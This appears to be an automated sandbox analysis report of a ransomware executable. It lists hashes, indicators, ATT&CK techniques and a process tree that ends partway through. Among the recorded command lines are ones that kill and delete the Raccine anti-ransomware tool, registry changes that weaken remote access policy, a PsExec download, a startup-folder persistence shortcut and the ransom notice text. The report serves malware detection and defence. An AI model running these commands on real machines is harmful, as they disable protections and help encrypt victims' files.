f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327

Resubmissions

18-01-2022 15:29

220118-sw4ecsbhen 10

29-10-2021 12:17

211029-pf6m1aaabk 10

Analysis

max time kernel
110s
max time network
122s
platform
windows10_x64
resource
win10-en-20211014
submitted
29-10-2021 12:17

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe
Size

133KB
MD5

91b493febfc1d782875a09fc076a8850
SHA1

ed12cfbedc90181e869fce19dc820063fa6b3179
SHA256

f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327
SHA512

bb66d4d65f8f615e6af06f4815233a2a7430373e4afc5a61a2b2fff0dc9a6a002b4edad0db2a336b24dabd65efc3b74f57985836d137f25eb87a1901cfa4b9a9

Score

8^/10

evasion persistence ransomware

Malware Config

Signatures

Downloads MZ/PE file
Downloads PsExec from SysInternals website 1 IoCs
Sysinternals tools like PsExec are often leveraged maliciously by malware families due to being commonly used by testers/administrators.

Processes:

description flow ioc

HTTP URL 30 http://live.sysinternals.com/PsExec64.exe
Modifies Windows Firewall 1 TTPs
evasion

Modify Existing Service
T1031

description	flow	ioc
HTTP URL	30	http://live.sysinternals.com/PsExec64.exe

Modifies extensions of user files 5 IoCs

Ransomware generally changes the extension on encrypted files.

ransomware

Processes:

f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe

description	ioc	process
File opened for modification	C:\Users\Admin\Pictures\CompleteLimit.tiff	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe
File renamed	C:\Users\Admin\Pictures\CompleteLimit.tiff => C:\Users\Admin\Pictures\CompleteLimit.tiff.REV	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe
File opened for modification	C:\Users\Admin\Pictures\CompleteLimit.tiff.REV	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe
File renamed	C:\Users\Admin\Pictures\EnterGrant.png => C:\Users\Admin\Pictures\EnterGrant.png.REV	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe
File opened for modification	C:\Users\Admin\Pictures\EnterGrant.png.REV	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe

Drops startup file 1 IoCs

Processes:

f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\reload1.lnk	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe

Drops desktop.ini file(s) 3 IoCs

Processes:

f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe

description	ioc	process
File opened for modification	C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\System Tools\Desktop.ini	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe
File opened for modification	C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Maintenance\Desktop.ini	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe
File opened for modification	C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Accessibility\Desktop.ini	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe

Enumerates connected drives 3 TTPs 24 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe

description	ioc	process
File opened (read-only)	\??\I:	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe
File opened (read-only)	\??\F:	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe
File opened (read-only)	\??\G:	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe
File opened (read-only)	\??\V:	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe
File opened (read-only)	\??\W:	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe
File opened (read-only)	\??\Y:	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe
File opened (read-only)	\??\H:	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe
File opened (read-only)	\??\B:	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe
File opened (read-only)	\??\M:	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe
File opened (read-only)	\??\E:	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe
File opened (read-only)	\??\T:	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe
File opened (read-only)	\??\P:	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe
File opened (read-only)	\??\A:	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe
File opened (read-only)	\??\S:	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe
File opened (read-only)	\??\K:	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe
File opened (read-only)	\??\X:	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe
File opened (read-only)	\??\R:	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe
File opened (read-only)	\??\O:	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe
File opened (read-only)	\??\J:	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe
File opened (read-only)	\??\L:	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe
File opened (read-only)	\??\Z:	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe
File opened (read-only)	\??\N:	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe
File opened (read-only)	\??\Q:	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe
File opened (read-only)	\??\U:	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe

Modifies WinLogon 2 TTPs 2 IoCs

persistence

Winlogon Helper DLL

T1004

Modify Registry

T1112

Processes:

f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeCaption = "Information..."	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeText = "All your files were encrypted, if you want to get them all back, please carefully read the text note located in your desktop..."	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe

Drops file in Windows directory 13 IoCs

Processes:

netsh.exe

description	ioc	process
File created	C:\Windows\rescache\_merged\3623239459\11870838.pri	netsh.exe
File created	C:\Windows\rescache\_merged\81479705\2284120958.pri	netsh.exe
File created	C:\Windows\rescache\_merged\3418783148\4223189797.pri	netsh.exe
File created	C:\Windows\rescache\_merged\4185669309\1880392806.pri	netsh.exe
File created	C:\Windows\rescache\_merged\1974107395\1506172464.pri	netsh.exe
File created	C:\Windows\rescache\_merged\1301087654\4010849688.pri	netsh.exe
File created	C:\Windows\rescache\_merged\1476457207\263943467.pri	netsh.exe
File created	C:\Windows\rescache\_merged\2878165772\3312292840.pri	netsh.exe
File created	C:\Windows\rescache\_merged\4183903823\1195458082.pri	netsh.exe
File created	C:\Windows\rescache\_merged\423379043\2764571712.pri	netsh.exe
File created	C:\Windows\rescache\_merged\2483382631\1144272743.pri	netsh.exe
File created	C:\Windows\rescache\_merged\4272278488\927794230.pri	netsh.exe
File created	C:\Windows\rescache\_merged\1601268389\3068621934.pri	netsh.exe

Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Kills process with taskkill 48 IoCs

evasion

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exe

pid	process
3544	taskkill.exe
700	taskkill.exe
380	taskkill.exe
1528	taskkill.exe
700	taskkill.exe
3572	taskkill.exe
1392	taskkill.exe
2864	taskkill.exe
4072	taskkill.exe
2652	taskkill.exe
1872	taskkill.exe
2460	taskkill.exe
3940	taskkill.exe
296	taskkill.exe
1656	taskkill.exe
840	taskkill.exe
1720	taskkill.exe
4004	taskkill.exe
2412	taskkill.exe
2776	taskkill.exe
3208	taskkill.exe
3192	taskkill.exe
2704	taskkill.exe
428	taskkill.exe
3860	taskkill.exe
2092	taskkill.exe
2060	taskkill.exe
1216	taskkill.exe
1416	taskkill.exe
1780	taskkill.exe
1148	taskkill.exe
1356	taskkill.exe
508	taskkill.exe
1944	taskkill.exe
3692	taskkill.exe
1956	taskkill.exe
800	taskkill.exe
2820	taskkill.exe
4060	taskkill.exe
2120	taskkill.exe
1756	taskkill.exe
836	taskkill.exe
3764	taskkill.exe
2648	taskkill.exe
3708	taskkill.exe
1172	taskkill.exe
2524	taskkill.exe
1040	taskkill.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry
T1112

Processes:

reg.exe

pid process

3604 reg.exe
Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery
T1018

Processes:

PING.EXE

pid process

1456 PING.EXE

pid	process
3604	reg.exe

pid	process
1456	PING.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe

pid	process
3140	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe
3140	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe
3140	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe
3140	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe
3140	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe
3140	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe
3140	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe
3140	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe
3140	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe
3140	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe
3140	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe
3140	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe
3140	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe
3140	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe
3140	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe
3140	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe
3140	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe
3140	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe
3140	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe
3140	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe
3140	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe
3140	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe
3140	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe
3140	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe
3140	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe
3140	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe
3140	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe
3140	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe
3140	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe
3140	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe
3140	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe
3140	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe
3140	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe
3140	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe
3140	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe
3140	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe
3140	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe
3140	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe
3140	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe
3140	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe
3140	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe
3140	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe
3140	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe
3140	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe
3140	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe
3140	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe
3140	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe
3140	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe
3140	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe
3140	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe
3140	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe
3140	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe
3140	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe
3140	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe
3140	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe
3140	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe
3140	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe
3140	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe
3140	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe
3140	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe
3140	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe
3140	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe
3140	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe
3140	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe

Suspicious use of AdjustPrivilegeToken 49 IoCs

Processes:

f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	3140	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe
Token: SeDebugPrivilege	428	taskkill.exe
Token: SeDebugPrivilege	1148	taskkill.exe
Token: SeDebugPrivilege	1356	taskkill.exe
Token: SeDebugPrivilege	4060	taskkill.exe
Token: SeDebugPrivilege	2120	taskkill.exe
Token: SeDebugPrivilege	508	taskkill.exe
Token: SeDebugPrivilege	3572	taskkill.exe
Token: SeDebugPrivilege	1392	taskkill.exe
Token: SeDebugPrivilege	700	taskkill.exe
Token: SeDebugPrivilege	2412	taskkill.exe
Token: SeDebugPrivilege	1872	taskkill.exe
Token: SeDebugPrivilege	2776	taskkill.exe
Token: SeDebugPrivilege	380	taskkill.exe
Token: SeDebugPrivilege	3860	taskkill.exe
Token: SeDebugPrivilege	2092	taskkill.exe
Token: SeDebugPrivilege	2460	taskkill.exe
Token: SeDebugPrivilege	2060	taskkill.exe
Token: SeDebugPrivilege	1172	taskkill.exe
Token: SeDebugPrivilege	1216	taskkill.exe
Token: SeDebugPrivilege	2524	taskkill.exe
Token: SeDebugPrivilege	1416	taskkill.exe
Token: SeDebugPrivilege	1756	taskkill.exe
Token: SeDebugPrivilege	3940	taskkill.exe
Token: SeDebugPrivilege	4072	taskkill.exe
Token: SeDebugPrivilege	1944	taskkill.exe
Token: SeDebugPrivilege	2864	taskkill.exe
Token: SeDebugPrivilege	3692	taskkill.exe
Token: SeDebugPrivilege	2652	taskkill.exe
Token: SeDebugPrivilege	1040	taskkill.exe
Token: SeDebugPrivilege	296	taskkill.exe
Token: SeDebugPrivilege	1956	taskkill.exe
Token: SeDebugPrivilege	800	taskkill.exe
Token: SeDebugPrivilege	1656	taskkill.exe
Token: SeDebugPrivilege	2820	taskkill.exe
Token: SeDebugPrivilege	840	taskkill.exe
Token: SeDebugPrivilege	836	taskkill.exe
Token: SeDebugPrivilege	1528	taskkill.exe
Token: SeDebugPrivilege	1720	taskkill.exe
Token: SeDebugPrivilege	3544	taskkill.exe
Token: SeDebugPrivilege	3764	taskkill.exe
Token: SeDebugPrivilege	4004	taskkill.exe
Token: SeDebugPrivilege	1780	taskkill.exe
Token: SeDebugPrivilege	3192	taskkill.exe
Token: SeDebugPrivilege	2648	taskkill.exe
Token: SeDebugPrivilege	2704	taskkill.exe
Token: SeDebugPrivilege	3708	taskkill.exe
Token: SeDebugPrivilege	700	taskkill.exe
Token: SeDebugPrivilege	2412	powershell.exe

Suspicious use of FindShellTrayWindow 3 IoCs

Processes:

f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe

pid	process
3140	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe
3140	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe
3140	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe

Suspicious use of SendNotifyMessage 3 IoCs

Processes:

f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe

pid	process
3140	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe
3140	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe
3140	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe

description	pid	process	target process
PID 3140 wrote to memory of 428	3140	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe	taskkill.exe
PID 3140 wrote to memory of 428	3140	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe	taskkill.exe
PID 3140 wrote to memory of 420	3140	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe	reg.exe
PID 3140 wrote to memory of 420	3140	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe	reg.exe
PID 3140 wrote to memory of 3604	3140	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe	reg.exe
PID 3140 wrote to memory of 3604	3140	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe	reg.exe
PID 3140 wrote to memory of 3872	3140	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe	schtasks.exe
PID 3140 wrote to memory of 3872	3140	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe	schtasks.exe
PID 3140 wrote to memory of 2132	3140	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe	sc.exe
PID 3140 wrote to memory of 2132	3140	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe	sc.exe
PID 3140 wrote to memory of 1112	3140	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe	sc.exe
PID 3140 wrote to memory of 1112	3140	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe	sc.exe
PID 3140 wrote to memory of 2088	3140	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe	sc.exe
PID 3140 wrote to memory of 2088	3140	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe	sc.exe
PID 3140 wrote to memory of 1072	3140	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe	netsh.exe
PID 3140 wrote to memory of 1072	3140	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe	netsh.exe
PID 3140 wrote to memory of 608	3140	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe	sc.exe
PID 3140 wrote to memory of 608	3140	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe	sc.exe
PID 3140 wrote to memory of 64	3140	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe	sc.exe
PID 3140 wrote to memory of 64	3140	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe	sc.exe
PID 3140 wrote to memory of 2988	3140	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe	sc.exe
PID 3140 wrote to memory of 2988	3140	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe	sc.exe
PID 3140 wrote to memory of 840	3140	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe	sc.exe
PID 3140 wrote to memory of 840	3140	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe	sc.exe
PID 3140 wrote to memory of 3644	3140	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe	sc.exe
PID 3140 wrote to memory of 3644	3140	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe	sc.exe
PID 3140 wrote to memory of 1148	3140	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe	taskkill.exe
PID 3140 wrote to memory of 1148	3140	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe	taskkill.exe
PID 3140 wrote to memory of 1356	3140	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe	taskkill.exe
PID 3140 wrote to memory of 1356	3140	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe	taskkill.exe
PID 3140 wrote to memory of 4060	3140	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe	taskkill.exe
PID 3140 wrote to memory of 4060	3140	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe	taskkill.exe
PID 3140 wrote to memory of 2120	3140	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe	taskkill.exe
PID 3140 wrote to memory of 2120	3140	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe	taskkill.exe
PID 3140 wrote to memory of 508	3140	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe	taskkill.exe
PID 3140 wrote to memory of 508	3140	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe	taskkill.exe
PID 3140 wrote to memory of 3572	3140	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe	taskkill.exe
PID 3140 wrote to memory of 3572	3140	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe	taskkill.exe
PID 3140 wrote to memory of 1392	3140	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe	taskkill.exe
PID 3140 wrote to memory of 1392	3140	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe	taskkill.exe
PID 3140 wrote to memory of 700	3140	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe	taskkill.exe
PID 3140 wrote to memory of 700	3140	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe	taskkill.exe
PID 3140 wrote to memory of 2412	3140	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe	taskkill.exe
PID 3140 wrote to memory of 2412	3140	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe	taskkill.exe
PID 3140 wrote to memory of 1872	3140	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe	taskkill.exe
PID 3140 wrote to memory of 1872	3140	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe	taskkill.exe
PID 3140 wrote to memory of 2776	3140	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe	taskkill.exe
PID 3140 wrote to memory of 2776	3140	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe	taskkill.exe
PID 3140 wrote to memory of 380	3140	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe	taskkill.exe
PID 3140 wrote to memory of 380	3140	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe	taskkill.exe
PID 3140 wrote to memory of 3860	3140	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe	taskkill.exe
PID 3140 wrote to memory of 3860	3140	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe	taskkill.exe
PID 3140 wrote to memory of 2092	3140	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe	taskkill.exe
PID 3140 wrote to memory of 2092	3140	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe	taskkill.exe
PID 3140 wrote to memory of 2460	3140	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe	taskkill.exe
PID 3140 wrote to memory of 2460	3140	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe	taskkill.exe
PID 3140 wrote to memory of 2060	3140	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe	taskkill.exe
PID 3140 wrote to memory of 2060	3140	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe	taskkill.exe
PID 3140 wrote to memory of 1172	3140	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe	taskkill.exe
PID 3140 wrote to memory of 1172	3140	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe	taskkill.exe
PID 3140 wrote to memory of 1216	3140	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe	taskkill.exe
PID 3140 wrote to memory of 1216	3140	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe	taskkill.exe
PID 3140 wrote to memory of 2524	3140	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe	taskkill.exe
PID 3140 wrote to memory of 2524	3140	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe	taskkill.exe

System policy modification 1 TTPs 4 IoCs

evasion

Modify Registry

T1112

Processes:

f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\LocalAccountTokenFilterPolicy = "1"	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1"	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\legalnoticecaption = "Information..."	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\legalnoticetext = "All your files were encrypted, if you want to get them all back, please carefully read the text note located in your desktop..."	f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe

C:\Users\Admin\AppData\Local\Temp\f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe
"C:\Users\Admin\AppData\Local\Temp\f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327.exe"
1⤵
- Modifies extensions of user files
- Drops startup file
- Drops desktop.ini file(s)
- Enumerates connected drives
- Modifies WinLogon
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
- System policy modification
PID:3140
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill" /F /IM RaccineSettings.exe
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:428
- C:\Windows\SYSTEM32\reg.exe
  "reg" delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Raccine Tray" /F
  2⤵
  PID:420
- C:\Windows\SYSTEM32\reg.exe
  "reg" delete HKCU\Software\Raccine /F
  2⤵
  - Modifies registry key
  PID:3604
- C:\Windows\SYSTEM32\schtasks.exe
